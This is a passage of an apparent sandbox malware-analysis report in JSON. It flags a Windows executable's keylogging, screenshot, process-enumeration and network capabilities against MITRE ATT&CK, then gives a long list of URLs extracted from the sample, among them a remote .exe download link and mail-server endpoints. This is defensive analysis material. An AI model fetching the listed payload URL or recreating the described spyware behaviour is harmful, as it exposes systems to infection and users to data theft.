\"GetKeyState\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2097218511\"\n \"cx\": \"325\"\n \"cy\": \"25\"}\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"671156864\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1291911738\"\n \"cx\": \"325\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"4476031772,5724,3024,,RtlGetVersion,NTDLL.dll,\"252:02:39.227\",RX=0,PX=0\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00005736.00000000.65854.001C0000.00000004.mdmp\")\n Found reference to API \"4,,RtlGetVersion,NTDLL.dll,\"252:02:43.372\",Rt\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"rundll32.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: _.exe]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: rundll32.exe]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: notepad_.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"http://www.3721.com/adjusttime.htm\"\n Pattern match: \"http://%s/\"\n Heuristic match: \"pop3.163.com\"\n Heuristic match: \"mail.online.ie\"\n Heuristic match: \"aha01%s@online.ie\"\n Pattern match: \"http://www.mxm9191.com/myrunner_up.exe\"\n Pattern match: \"http://www.zigui.org/article.php?id=103822\"\n Pattern match: \"www.3721.com/adjusttime.htmmozilla/4.0\"\n Pattern match: \"www.zigui.org\"\n Pattern match: \"www.zigui.orgconnection\"\n Pattern match: \"www.zigui.org/article.php?id=103822\"\n Heuristic match: \"ww.zigui.org\"\n Heuristic match: \"igui.org\"\n Heuristic match: \"zigui.org\"\n Pattern match: \"www.eol.cn/\"\n Heuristic match: \"w.zigui.org\"\n Pattern match: \"www.rakuten.co.jp/\"\n Heuristic match: \"o.com\"\n Pattern match: \"www.priceline.com/\"\n Pattern match: \"www.meetic.es/\"\n Pattern match: \"www.mynet.com/\"\n Pattern match: \"www.scribd.com/\"\n Pattern match: \"www.sapo.pt/\"\n Pattern match: \"www.laredoute.fr\"\n Heuristic match: \"autoscout24.de\"\n Heuristic match: \"unrulymedia.com\"\n Heuristic match: \"partycasino.com\"\n Heuristic match: \"lfstmedia.com\"\n Heuristic match: \"directadvert.ru\"\n Heuristic match: \"spotxchange.com\"\n Heuristic match: \"tiara.daum.net\"\n Pattern match: \"www.blogcu.com\"\n Heuristic match: \"tribalfusion.com\"\n Heuristic match: \"x01.aidata.io\"\n Heuristic match: \"u3s.mathtag.com\"\n Heuristic match: \"listenvid.com\"\n Heuristic match: \"buenastareas.com\"\n Heuristic match: \"virginmedia.com\"\n Pattern match: \"www.amazon.de\"\n Heuristic match: \"adfarm1.adition.com\"\n Heuristic match: \"savings-united.com\"\n Pattern match: \"www.foodnetwork.com\"\n Pattern match: \"www.gamesgames.com\"\n Pattern match: \"www.microsoft.com\"\n Heuristic match: \"urbandictionary.com\"\n Heuristic match: \"config.parsely.com\"\n Heuristic match: \"y.one.impact-ad.jp\"\n Pattern match: \"www.lowermybills.com\"\n Pattern match: \"www.eastmoney.com\"\n Heuristic match: \"yjtag.yahoo.co.jp\"\n Heuristic match: \"secure.calcch.com\"\n Heuristic match: \"logging.admicro.vn\"\n Pattern match: \"www.bloomberg.com\"\n Heuristic match: \"rincondelvago.com\"\n Pattern match: \"www.moviefone.com\"\n Heuristic match: \"accounts.google.com\"\n Heuristic match: \"ibeu2.mookie1.com\"\n Heuristic match: \"it.altervista.org\"\n Heuristic match: \"ggsearch.2345.com\"\n Heuristic match: \"skimresources.com\"\n Pattern match: \"www.babycenter.com\"\n Heuristic match: \"moc.ataderusaert.ni\"\n Heuristic match: \"in.treasuredata.com\"\n Heuristic match: \"px.powerlinks.com\"\n Heuristic match: \"izlesene.com\"\n Heuristic match: \"trugaze.io\"\n Heuristic match: \"youku.com\"\n Heuristic match: \"ip138.com\"\n Heuristic match: \"gssprt.jp\"\n Heuristic match: \"baidu.com\"\n Heuristic match: \"semasio.net\"\n Heuristic match: \"kuwan8.com\"\n Pattern match: \"www.aa.com\"\n Pattern match: \"www.irs.gov\"\n Heuristic match: \"owneriq.net\"\n Heuristic match: \"t-mobile.com\"\n Heuristic match: \"conectiva.io\"\n Heuristic match: \"ngfiles.com\"\n Heuristic match: \"gamespot.com\"\n Heuristic match: \"abtasty.com\"\n Heuristic match: \"adhigh.net\"\n Heuristic match: \"zoosnet.net\"\n Heuristic match: \"yahoo.com\"\n Heuristic match: \"yabidos.com\"\n Heuristic match: \"pardot.com\"\n Heuristic match: \"kugou.com\"\n Heuristic match: \"wbtrk.net\"\n Heuristic match: \"stardoll.com\"\n Heuristic match: \"adnxs.com\"\n Heuristic match: \"bitauto.com\"\n Heuristic match: \"esmas.com\"\n Heuristic match: \"adtdp.com\"\n Heuristic match: \"tidaltv.com\"\n Heuristic match: \"meituan.com\"\n Heuristic match: \"tw.yahoo.com\"\n Heuristic match: \"11st.co.kr\"\n Heuristic match: \"break.com\"\n Heuristic match: \"youdao.com\"\n Heuristic match: \"mashable.com\"\n Heuristic match: \"wrating.com\"\n Heuristic match: \"livedoor.com\"\n Heuristic match: \"85play.com\"\n Heuristic match: \"next.co.uk\"\n Heuristic match: \"newscgp.com\"\n Heuristic match: \"videoamp.com\"\n Heuristic match: \"openx.net\"\n Heuristic match: \"irs01.com\"\n Heuristic match: \"duba.com\"\n Heuristic match: \"wsj.com\"\n Heuristic match: \"gap.com\"\n Heuristic match: \"bidr.io\"\n Heuristic match: \"naver.jp\"\n Heuristic match: \"7k7k.com\"\n Heuristic match: \"ioam.de\"\n Heuristic match: \"java.com\"\n Heuristic match: \"tanx.com\"\n Heuristic match: \"songs.pk\"\n Heuristic match: \"fout.jp\"\n Heuristic match: \"2ch.net\"\n Heuristic match: \"9223.com\"\n Heuristic match: \"krxd.net\"\n Heuristic match: \"popin.cc\"\n Heuristic match: \"daum.net\"\n Heuristic match: \"yimg.com\"\n Heuristic match: \"knet.cn\"\n Heuristic match: \"xiti.com\"\n Heuristic match: \"rk.oc.tm\"\n Heuristic match: \"mt.co.kr\"\n Heuristic match: \"webs.com\"\n Heuristic match: \"etsy.com\"\n Heuristic match: \"nasa.gov\"\n Heuristic match: \"hulu.com\"\n Heuristic match: \"ikea.com\"\n Heuristic match: \"3366.com\"\n Heuristic match: \"w55c.net\"\n Heuristic match: \"moc.ae\"\n Heuristic match: \"ea.com\"\n Heuristic match: \"ning.com\"\n Heuristic match: \"wwe.com\"\n Heuristic match: \"pho.to\"\n Heuristic match: \"csdn.net\"\n Heuristic match: \"g.58.com\"\n Heuristic match: \"dell.com\"\n Heuristic match: \"ebay.com\"\n Heuristic match: \"cpx.to\"\n Heuristic match: \"pof.com\"\n Heuristic match: \"yoka.com\"\n Heuristic match: \"1rx.io\"\n Heuristic match: \"bing.com\"\n Heuristic match: \"teads.tv\"\n Heuristic match: \"tap2-cdn.rubiconproject.com\"\n Heuristic match: \"secure-assets.rubiconproject.com\"\n Heuristic match: \"droit-finances.commentcamarche.net\"\n Heuristic match: \"kpruanalytics.solution.weborama.fr\"\n Heuristic match: \"8428790487.log.optimizely.com\"\n Pattern match: \"www.nationalgeographic.com\"\n Pattern match: \"www.reuters.wallst.com\"\n Heuristic match: \"pixel.rubiconproject.com\"\n Heuristic match: \"adaptv.advertising.com\"\n Heuristic match: \"rum-dytrc.corriere.it\"\n Pattern match: \"www.howstuffworks.com\"\n Heuristic match: \"livechatinc.com\"\n Heuristic match: \"technical-service.net\"\n Heuristic match: \"scorecardresearch.com\"\n Heuristic match: \"ads.creative-serving.com\"\n Heuristic match: \"api.webdata.ledu.com\"\n Pattern match: \"www.americanas.com.br\"\n Pattern match: \"www.juegosdiarios.com\"\n Heuristic match: \"nationalgeographic.com\"\n Pattern match: \"www.urbandictionary.com\"\n Heuristic match: \"kakakucom.112.2o7.net\"\n Pattern match: \"www.tripadvisor.co.uk\"\n Pattern match: \"www.credit-agricole.fr\"\n Heuristic match: \"tap.rubiconproject.com\"\n Heuristic match: \"adobe.tt.omtrdc.net\"\n Pattern match: \"www.liveadexchanger.com\"\n Heuristic match: \"moc.sys-gnivres.sb\"\n Heuristic match: \"bs.serving-sys.com\"\n Heuristic match: \"dotlinux02.doubledot.es\"\n Heuristic match: \"national-lottery.co.uk\"\n Heuristic match: \"laredoute.commander1.com\"\n Heuristic match: \"statse.webtrendslive.com\"\n Heuristic match: \"neural09.cdnwebcloud.com\"\n Heuristic match: \"targeting.unrulymedia.com\"\n Heuristic match: \"convertro.com\"\n Heuristic match: \"api.unthem.com\"\n Pattern match: \"www.hao123.com\"\n Heuristic match: \"wordpress.org\"\n Heuristic match: \"pconline.com.cn\"\n Pattern match: \"www.blizzard.com\"\n Heuristic match: \"tealiumiq.com\"\n Heuristic match: \"admaster.com.cn\"\n Heuristic match: \"basebanner.com\"\n Heuristic match: \"eyeviewads.com\"\n Pattern match: \"www.114la.com\"\n Pattern match: \"www.toshiba.com\"\n Heuristic match: \"sharethis.com\"\n Pattern match: \"www.sogou.com\"\n Heuristic match: \"newgrounds.com\"\n Heuristic match: \"impress.co.jp\"\n Heuristic match: \"bigmining.com\"\n Pattern match: \"www.topix.com\"\n Heuristic match: \"infospace.com\"\n Pattern match: \"www.metacafe.com\"\n Pattern match: \"www.tamgrt.com\"\n Heuristic match: \"a1.adform.net\"\n Heuristic match: \"match.rundsp.com\"\n Heuristic match: \"go.sonobi.com\"\n Heuristic match: \"wunderground.com\"\n Heuristic match: \"rtb.4finance.com\"\n Pattern match: \"www.msn.com\"\n Heuristic match: \"lightboxcdn.com\"\n Heuristic match: \"pi.pardot.com\"\n Heuristic match: \"indiatimes.com\"\n Heuristic match: \"pixel.keywee.co\"\n Pattern match: \"www.oricon.co.jp\"\n Heuristic match: \"springserve.com\"\n Heuristic match: \"accuweather.com\"\n Pattern match: \"www.pixnet.net\"\n Heuristic match: \"adsymptotic.com\"\n Heuristic match: \"groupon.co.uk\"\n Heuristic match: \"pclady.com.cn\"\n Pattern match: \"www.corriere.it\"\n Heuristic match: \"casalemedia.com\"\n Heuristic match: \"mediaplex.com\"\n Heuristic match: \"tns-counter.ru\"\n Heuristic match: \"ads.linkedin.com\"\n Heuristic match: \"eastmoney.com\"\n Heuristic match: \"mtvnservices.com\"\n Heuristic match: \"freegeoip.net\"\n Heuristic match: \"connexity.net\"\n Pattern match: \"www.avast.com\"\n Heuristic match: \"infoseek.co.jp\"\n Heuristic match: \"pzd.rakuten.co.jp\"\n Heuristic match: \"image.livedoor.com\"\n Heuristic match: \"amazon-adsystem.com\"\n Heuristic match: \"giveawayoftheday.com\"\n Heuristic match: \"stats02.topix.com\"\n Pattern match: \"www.firstload.com\"\n Heuristic match: \"rubiconproject.com\"\n Pattern match: \"www.groupon.co.uk\"\n Heuristic match: \"wordreference.com\"\n Heuristic match: \"juegosdiarios.com\"\n Heuristic match: \"bpid.bigpoint.net\"\n Pattern match: \"www.virginmedia.com\"\n Heuristic match: \"trtstats.topix.com\"\n Heuristic match: \"count.pclady.com.cn\"\n Pattern match: \"www.tripadvisor.com\"\n Heuristic match: \"bbs.aoshitang.com\"\n Pattern match: \"www.whitepages.com\"\n Heuristic match: \"whisky.ana.stg8.com\"\n Heuristic match: \"globalwebindex.net\"\n Pattern match: \"www.buenastareas.com\"\n Heuristic match: \"server.seadform.net\"\n Pattern match: \"www.thecredits.org\"\n Pattern match: \"www.autotrader.co.uk\"\n Heuristic match: \"bedbathandbeyond.com\"\n Pattern match: \"www.accuweather.com\"\n Heuristic match: \"howstuffworks.com\"\n Heuristic match: \"webcollect.kugou.com\"\n Pattern match: \"www.submarino.com.br\"\n Heuristic match: \"worldstarhiphop.com\"\n Heuristic match: \"autouk.demdex.net\"\n Heuristic match: \"dmg.digitaltarget.ru\"\n Heuristic match: \"ezinearticles.com\"\n Heuristic match: \"brightonclick.com\"\n Heuristic match: \"strawberryperl.com\"\n Heuristic match: \"americanas.com.br\"\n Pattern match: \"www.southwest.com\"\n Heuristic match: \"ads.stickyadstv.com\"\n Heuristic match: \"verizonwireless.com\"\n Heuristic match: \"weborama.com\"\n Heuristic match: \"dotomi.com\"\n Heuristic match: \"pingdom.net\"\n Heuristic match: \"xunlei.com\"\n Heuristic match: \"cxense.com\"\n Heuristic match: \"xfinity.com\"\n Heuristic match: \"hubpages.com\"\n Heuristic match: \"mookie1.com\"\n Heuristic match: \"marinsm.com\"\n Pattern match: \"www.wsj.com\"\n Heuristic match: \"ad-stir.com\"\n Heuristic match: \"yaplog.jp\"\n Heuristic match: \"miaozhen.com\"\n Heuristic match: \"amazon.de\"\n Heuristic match: \"webkinz.com\"\n Heuristic match: \"iza.ne.jp\"\n Heuristic match: \"soflopxl.com\"\n Heuristic match: \"patch.com\"\n Heuristic match: \"s3xified.com\"\n Heuristic match: \"united.com\"\n Heuristic match: \"zimbio.com\"\n Heuristic match: \"p.crm4d.com\"\n Heuristic match: \"114la.com\"\n Heuristic match: \"adgrx.com\"\n Heuristic match: \"topixcdn.com\"\n Heuristic match: \"weather.gov\"\n Heuristic match: \"cbsnews.com\"\n Heuristic match: \"seadform.net\"\n Heuristic match: \"c.bing.com\"\n Pattern match: \"www.fifa.com\"\n Heuristic match: \"sogou.com\"\n Heuristic match: \"net.finam.ru\"\n Heuristic match: \"topix.com\"\n Heuristic match: \"impdesk.com\"\n Heuristic match: \"outbrain.com\"\n Heuristic match: \"rising.cn\"\n Heuristic match: \"itsfogo.com\"\n Heuristic match: \"innovid.com\"\n Heuristic match: \"trialpay.com\"\n Heuristic match: \"yieldmo.com\"\n Heuristic match: \"tesco.com\"\n Heuristic match: \"thench.net\"\n Heuristic match: \"iqiyi.com\"\n Heuristic match: \"google.es\"\n Heuristic match: \"yieldlab.net\"\n Pattern match: \"www.onet.pl\"\n Heuristic match: \"rfihub.com\"\n Heuristic match: \"criteo.com\"\n Heuristic match: \"gosunpro.com\"\n Heuristic match: \"xdating.com\"\n Pattern match: \"www.pof.com\"\n Heuristic match: \"mobile.de\"\n Heuristic match: \"ml314.com\"\n Heuristic match: \"adotmob.com\"\n Heuristic match: \"thesun.co.uk\"\n Heuristic match: \"xcar.com.cn\"\n Heuristic match: \"scanscout.com\"\n Heuristic match: \"vagalume.com.br\"\n Heuristic match: \"flashtalking.com\"\n Pattern match: \"www.ryanair.com\"\n Pattern match: \"www.reuters.com\"\n Pattern match: \"www.toysrus.com\"\n Heuristic match: \"sharethrough.com\"\n Heuristic match: \"myvisualiq.net\"\n Heuristic match: \"doubleclick.net\"\n Heuristic match: \"undertone.com\"\n Heuristic match: \"espncricinfo.com\"\n Pattern match: \"www.nextag.com\"\n Pattern match: \"www.foxnews.com\"\n Heuristic match: \"send.microad.jp\"\n Heuristic match: \"ads.pubmatic.com\"\n Heuristic match: \"track.wvtu.net\"\n Heuristic match: \"etsystudio.com\"\n Pattern match: \"www.drugs.com\"\n Heuristic match: \"dantri.com.vn\"\n Heuristic match: \"onesignal.com\"\n Heuristic match: \"ipredictive.com\"\n Heuristic match: \"ads.webkinz.com\"\n Pattern match: \"www.usatoday.com\"\n Heuristic match: \"my.rtmark.net\"\n Pattern match: \"www.agame.com\"\n Heuristic match: \"hubstatic.com\"\n Heuristic match: \"travelzoo.com\"\n Heuristic match: \"moviefone.com\"\n Pattern match: \"www.aipai.com\"\n Heuristic match: \"tripadvisor.com\"\n Pattern match: \"www.latimes.com\"\n Pattern match: \"www.mp3raid.xyz\"\n Heuristic match: \"thecredits.org\"\n Heuristic match: \"dpm.demdex.net\"\n Heuristic match: \"sundaysky.com\"\n Heuristic match: \"switchadhub.com\"\n Heuristic match: \"quantserve.com\"\n Heuristic match: \"autoitscript.com\"\n Heuristic match: \"statcounter.com\"\n Heuristic match: \"yumenetworks.com\"\n Heuristic match: \"minijuegos.com\"\n Heuristic match: \"slideshare.net\"\n Heuristic match: \"stars.topix.com\"\n Heuristic match: \"moc.tniopgib.se\"\n Heuristic match: \"es.bigpoint.com\"\n Pattern match: \"www.livedoor.com\"\n Heuristic match: \"craigslist.org\"\n Heuristic match: \"ad.360yield.com\"\n Heuristic match: \"creativecdn.com\"\n Heuristic match: \"621373388.log.optimizely.com\"\n Heuristic match: \"58011369.log.optimizely.com\"\n Heuristic match: \"200632758.log.optimizely.com\"\n Heuristic match: \"match.adsby.bidtheatre.com\"\n Heuristic match: \"login.microsoftonline.com\"\n Heuristic match: \"renren.com\"\n Heuristic match: \"makepolo.com\"\n Heuristic match: \"mthai.com\"\n Heuristic match: \"gumtree.com\"\n Heuristic match: \"melia.com\"\n Heuristic match: \"wikihow.com\"\n Heuristic match: \"verizon.com\"\n Pattern match: \"www.citi.com\"\n Heuristic match: \"yahoo.co.jp\"\n Heuristic match: \"scribd.com\"\n Heuristic match: \"weborama.fr\"\n Heuristic match: \"51job.com\"\n Heuristic match: \"demdex.net\"\n Heuristic match: \"extend.tv\"\n Heuristic match: \"norton.com\"\n Heuristic match: \"answers.com\"\n Heuristic match: \"aipai.com\"\n Heuristic match: \"3lift.com\"\n Heuristic match: \"mxptint.net\"\n Heuristic match: \"xtgreat.com\"\n Heuristic match: \"taboola.com\"\n Heuristic match: \"exblog.jp\"\n Heuristic match: \"media.net\"\n Heuristic match: \"adobe.com\"\n Heuristic match: \"drugs.com\"\n Heuristic match: \"oracle.com\"\n Heuristic match: \"jivox.com\"\n Heuristic match: \"friend.ly\"\n Heuristic match: \"wupload.com\"\n Heuristic match: \"logly.co.jp\"\n Heuristic match: \"gametop.com\"\n Pattern match: \"www.gov.uk\"\n Heuristic match: \"hotwire.com\"\n Heuristic match: \"adhood.com\"\n Heuristic match: \"sanspo.com\"\n Heuristic match: \"mmstat.com\"\n Heuristic match: \"teacup.com\"\n Heuristic match: \"virgul.com\"\n Heuristic match: \"rockyou.net\"\n Heuristic match: \"nicovideo.jp\"\n Heuristic match: \"im-apps.net\"\n Heuristic match: \"adingo.jp\"\n Heuristic match: \"socdm.com\"\n Heuristic match: \"agame.com\"\n Heuristic match: \"eonline.com\"\n Heuristic match: \"altergeo.ru\"\n Heuristic match: \"yoyi.com.cn\"\n Heuristic match: \"adtechus.com\"\n Heuristic match: \"zillow.com\"\n Heuristic match: \"keyade.com\"\n Heuristic match: \"qunar.com\"\n Heuristic match: \"addthis.com\"\n Heuristic match: \"durasite.net\"\n Heuristic match: \"adriver.ru\"\n Heuristic match: \"tao123.com\"\n Heuristic match: \"shopathome.com\"\n Heuristic match: \"lineadirecta.com\"\n Heuristic match: \"shockwave.com\"\n Heuristic match: \"postrelease.com\"\n Heuristic match: \"visualdna.com\"\n Pattern match: \"www.iqiyi.com\"\n Heuristic match: \"liutilities.com\"\n Heuristic match: \"superpages.com\"\n Heuristic match: \"acxiomapac.com\"\n Heuristic match: \"dlx.addthis.com\"\n Heuristic match: \"websimages.com\"\n Heuristic match: \"reference.com\"\n Pattern match: \"www.lazada.vn\"\n Heuristic match: \"nexac.demdex.net\"\n Heuristic match: \"nickelodeon.es\"\n Heuristic match: \"ke.youdao.com\"\n Pattern match: \"www.compado.es\"\n Pattern match: \"www.linkedin.com\"\n Heuristic match: \"optimatic.com\"\n Pattern match: \"www.amazon.com\"\n Pattern match: \"www.aweber.com\"\n Heuristic match: \"domaintools.com\"\n Heuristic match: \"doctissimo.fr\"\n Heuristic match: \"gmarket.co.kr\"\n Heuristic match: \"tripod.lycos.com\"\n Pattern match: \"www.musica.com\"\n Heuristic match: \"serve.popads.net\"\n Heuristic match: \"southwest.com\"\n Heuristic match: \"city-data.com\"\n Heuristic match: \"adventori.com\"\n Heuristic match: \"rcsmetrics.it\"\n Heuristic match: \"4paradigm.com\"\n Heuristic match: \"craigslist.es\"\n Heuristic match: \"capitalone.com\"\n Heuristic match: \"monografias.com\"\n Heuristic match: \"milliyet.com.tr\"\n Heuristic match: \"piximedia.com\"\n Heuristic match: \"flipboard.com\"\n Heuristic match: \"foodnetwork.com\"\n Heuristic match: \"everesttech.net\"\n Pattern match: \"www.zimbio.com\"\n Pattern match: \"www.hc360.com\"\n Pattern match: \"www.izlesene.com\"\n Pattern match: \"www.stardoll.com\"\n Pattern match: \"www.scribd.com\"\n Heuristic match: \"gwallet.com\"\n Heuristic match: \"atwiki.jp\"\n Heuristic match: \"globo.com\"\n Heuristic match: \"vtracy.de\"\n Heuristic match: \"zappos.com\"\n Heuristic match: \"yandex.ru\"\n Heuristic match: \"europa.eu\"\n Heuristic match: \"ad.zanox.com\"\n Pattern match: \"www.kbb.com\"\n Pattern match: \"www.7k7k.com\"\n Heuristic match: \"antdsp.com\"\n Heuristic match: \"virool.com\"\n Pattern match: \"www.duba.com\"\n Heuristic match: \"asahi.com\"\n Heuristic match: \"elpais.com\"\n Heuristic match: \"yengo.com\"\n Heuristic match: \"adtechjp.com\"\n Heuristic match: \"bluekai.com\"\n Heuristic match: \"pubmatic.com\"\n Heuristic match: \"amazon.co.jp\"\n Heuristic match: \"ctnsnet.com\"\n Heuristic match: \"btrll.com\"\n Heuristic match: \"easydmp.net\"\n Heuristic match: \"mirtesen.ru\"\n Heuristic match: \"state.gov\"\n Heuristic match: \"kakaku.com\"\n Heuristic match: \"pixnet.net\"\n Heuristic match: \"aidata.io\"\n Heuristic match: \"eyeota.net\"\n Heuristic match: \"directv.com\"\n Heuristic match: \"mathtag.com\"\n Heuristic match: \"foxnews.com\"\n Heuristic match: \"deqwas.net\"\n Pattern match: \"www.ing.nl\"\n Heuristic match: \"laredoute.fr\"\n Heuristic match: \"addtoany.com\"\n Heuristic match: \"fandango.com\"\n Heuristic match: \"netseer.com\"\n Heuristic match: \"softonic.com\"\n Heuristic match: \"glotgrx.com\"\n Heuristic match: \"hc360.com\"\n Heuristic match: \"adsrvr.org\"\n Heuristic match: \"4shared.com\"\n Heuristic match: \"facebook.com\"\n Heuristic match: \"abril.com.br\"\n Heuristic match: \"duote.com\"\n Heuristic match: \"usafis.org\"\n Heuristic match: \"hubspot.net\"\n Heuristic match: \"netmng.com\"\n Heuristic match: \"365profx.com\"\n Heuristic match: \"simpli.fi\"\n Heuristic match: \"latimes.com\"\n Heuristic match: \"reuters.com\"\n Heuristic match: \"ryanair.com\"\n Heuristic match: \"toysrus.com\"\n Heuristic match: \"districtm.ca\"\n Heuristic match: \"2o7.net\"\n Heuristic match: \"vk.com\"\n Heuristic match: \"m18.com\"\n Heuristic match: \"m6r.eu\"\n Heuristic match: \"ebay.it\"\n Heuristic match: \"ups.com\"\n Heuristic match: \"mtv.com\"\n Heuristic match: \"ing.nl\"\n Heuristic match: \"mail.ru\"\n Heuristic match: \"king.com\"\n Heuristic match: \"turn.com\"\n Heuristic match: \"ledu.com\"\n Heuristic match: \"smi2.net\"\n Heuristic match: \"yadro.ru\"\n Heuristic match: \"l.qq.com\"\n Heuristic match: \"zedo.com\"\n Heuristic match: \"kbb.com\"\n Heuristic match: \"goal.com\"\n Heuristic match: \"ya.ru\"\n Heuristic match: \"erne.co\"\n Heuristic match: \"imvu.com\"\n Heuristic match: \"wat.tv\"\n Heuristic match: \"sapo.pt\"\n Heuristic match: \"96pk.com\"\n Heuristic match: \"dsp.io\"\n Heuristic match: \"kdata.fr\"\n Heuristic match: \"5ch.net\"\n Heuristic match: \"ask.com\"\n Heuristic match: \"citi.com\"\n Heuristic match: \"qvc.com\"\n Heuristic match: \"esm1.net\"\n Heuristic match: \"ur.pk\"\n Heuristic match: \"kp.ru\"\n Heuristic match: \"254a.com\"\n Heuristic match: \"hi5.com\"\n Heuristic match: \"58.com\"\n Heuristic match: \"chip.de\"\n Heuristic match: \"msn.com\"\n Heuristic match: \"web.de\"\n Heuristic match: \"abmr.net\"\n Heuristic match: \"imdb.com\"\n Heuristic match: \"tmz.com\"\n Heuristic match: \"eol.cn\"\n Heuristic match: \"51.com\"\n Heuristic match: \"bild.de\"\n Heuristic match: \"1dmp.io\"\n Heuristic match: \"alot.com\"\n Heuristic match: \"smi2.ru\"\n Heuristic match: \"minijuegosgratis.com\"\n Heuristic match: \"vatrack.hinet.net\"\n Pattern match: \"www.maxonclick.com\"\n Heuristic match: \"acuityplatform.com\"\n Heuristic match: \"power.gosunpro.com\"\n Heuristic match: \"ads.programattik.com\"\n Heuristic match: \"company-target.com\"\n Pattern match: \"www.netshoes.com.br\"\n Heuristic match: \"count.pcauto.com.cn\"\n Heuristic match: \"sxp.smartclip.net\"\n Heuristic match: \"s.thebrighttag.com\"\n Heuristic match: \"angelfire.lycos.com\"\n Pattern match: \"www.warnerbros.com\"\n Heuristic match: \"liveadexchanger.com\"\n Pattern match: \"www.wunderground.com\"\n Heuristic match: \"bleacherreport.com\"\n Heuristic match: \"cstatic.weborama.fr\"\n Heuristic match: \"beacon.walmart.com\"\n Pattern match: \"www.pagesjaunes.fr\"\n Pattern match: \"www.superpages.com\"\n Pattern match: \"www.milliyet.com.tr\"\n Heuristic match: \"counter.pixplug.in\"\n Pattern match: \"www.newgrounds.com\"\n Heuristic match: \"sp1.convertro.com\"\n Heuristic match: \"moshimonsters.com\"\n Pattern match: \"www.cheapoair.com\"\n Pattern match: \"www.instagram.com\"\n Heuristic match: \"addictinggames.com\"\n Heuristic match: \"bankofamerica.com\"\n Heuristic match: \"tripadvisor.co.uk\"\n Pattern match: \"www.espncricinfo.com\"\n Heuristic match: \"horyzon-media.com\"\n Pattern match: \"www.pcauto.com.cn\"\n Heuristic match: \"it.ebayrtm.com\"\n Heuristic match: \"walgreens.com\"\n Heuristic match: \"people.com.cn\"\n Heuristic match: \"xpg.uol.com.br\"\n Heuristic match: \"nakanohito.jp\"\n Heuristic match: \"hit.gemius.pl\"\n Heuristic match: \"babycenter.com\"\n Heuristic match: \"mtvn.demdex.net\"\n Heuristic match: \"imrworldwide.com\"\n Heuristic match: \"i-mobile.co.jp\"\n Heuristic match: \"velocecdn.com\"\n Heuristic match: \"priceline.com\"\n Heuristic match: \"sitescout.com\"\n Heuristic match: \"shutterfly.com\"\n Pattern match: \"www.answers.com\"\n Heuristic match: \"track.adform.net\"\n Heuristic match: \"autoscout24.be\"\n Heuristic match: \"autotrader.com\"\n Heuristic match: \"baixaki.com.br\"\n Heuristic match: \"pos.baidu.com\"\n Heuristic match: \"infolinks.com\"\n Heuristic match: \"blackberry.com\"\n Pattern match: \"www2.bing.com\"\n Pattern match: \"www.goo.ne.jp\"\n Heuristic match: \"dowjoneson.com\"\n Heuristic match: \"pixanalytics.com\"\n Pattern match: \"www.sanspo.com\"\n Pattern match: 